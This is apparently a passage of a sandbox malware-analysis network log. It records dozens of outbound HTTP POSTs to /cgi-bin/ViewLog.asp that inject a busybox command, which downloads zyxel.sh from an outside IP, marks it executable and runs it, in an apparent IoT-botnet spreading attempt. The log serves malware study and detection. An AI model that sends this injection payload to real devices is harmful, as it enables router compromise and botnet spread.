64 65 72 73 74 61 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 69 6e 76 61 6c 69 64 20 73 79 6e 74 61 78 2e 20 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e
                                                            Data Ascii: <!DOCTYPE html><html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 400</title><style>*{margin:0;padding:0}html{font:15px/22px arial,sans-serif;background: #fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}p{margin:11px 0 22px;overflow :hidden}ins{color:#777;text-decoration :none;}</style><p><b>400 - Bad Request .</b> <ins>Thats an error.</ins><p>Server could not understand the request due to invalid syntax. <ins>Thats all we know.</ins>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1003192.168.2.233398631.136.108.1778080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.291373014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:18.416008949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.559159040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:36.589560032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:02.441937923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1004192.168.2.235830031.136.139.1488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.310914040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:18.416003942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:24.559263945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:36.589562893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:02.441937923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1005192.168.2.235283494.120.101.2038080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.335951090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1006192.168.2.234239694.123.140.898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.336172104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1007192.168.2.235299095.170.149.698080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.350225925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1008192.168.2.233973694.110.7.388080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.358403921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1009192.168.2.235230431.136.166.328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.505264997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.144418001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.392183065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.951836109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.071137905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:35.053689003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298849106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1010192.168.2.235366431.136.84.2218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.512316942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:16.176372051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.520097971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:20.207798958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.583019972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:36.333605051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:58.346566916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1011192.168.2.235011262.240.19.58080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.546251059 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1012192.168.2.235640294.187.117.1838080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.578788996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1013192.168.2.235062294.123.3.1248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.583561897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            1014192.168.2.234956094.121.57.1218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:30:15.583812952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
